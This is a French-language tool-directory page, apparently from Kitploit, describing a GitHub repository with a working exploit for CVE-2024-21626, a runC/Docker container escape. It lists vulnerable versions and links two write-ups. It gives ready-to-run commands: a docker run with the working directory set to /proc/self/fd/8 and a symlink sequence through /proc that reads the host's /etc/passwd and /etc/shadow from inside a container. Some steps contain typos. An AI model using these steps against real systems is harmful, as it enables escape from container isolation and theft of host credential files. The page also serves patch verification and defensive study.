Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21626 — Exploit fonctionnel pour CVE-2024-21626, une évasion de conteneur runC/Docker via une attaque par lien symbolique sur le répertoire de travail, permettant l'accès au système de fichiers de l'hôte. | Kitploit
Outils/GitHubGitHub/flojboj/cve-2024-21626
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité CloudÉvasion de Conteneur
GitHubflojboj/cve-2024-21626

CVE-2024-21626

Exploit fonctionnel pour CVE-2024-21626, une évasion de conteneur runC/Docker via une attaque par lien symbolique sur le répertoire de travail, permettant l'accès au système de fichiers de l'hôte.

Voir le dépôt
114il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21626

Exploit (répertoire de travail)

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

  • Il est important de mettre -w /proc/self/fd/8\
  • Accédez au système de fichiers de l'hôte avec cat ../../../../../../../../../etc/passwd à l'intérieur du conteneur

Exploit (Symlink)

  1. docker run --name cve-2024-21626 --rm --it debian:bootworm
  2. Dans le conteneur - ln -sf /proc/self/fd/7/ /foo
  3. Dans le conteneur - ln -sf /proc/self/fd/8/ /bar
  4. docker exec -it -w /bar cve-2024-21626 sleep 120
  5. Dans le conteneur - ls -F /proc
  6. Dans le conteneur - cat /proc/9/cmdline (trouvez le PID de la commande sleep)
  7. Dans le conteneur - cat /proc/9/cwd/../../../../../etc/shadow

Versions vulnérables

  • runC : >= 1.0.0-rc93 et <= 1.1.11.
  • containerd : >= 1.4.7 et <= 1.6.27, et >= 1.7.0 et <= 1.7.12.
  • Docker : corrigé dans 25.0.2

Source

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626

Télécharger l’outil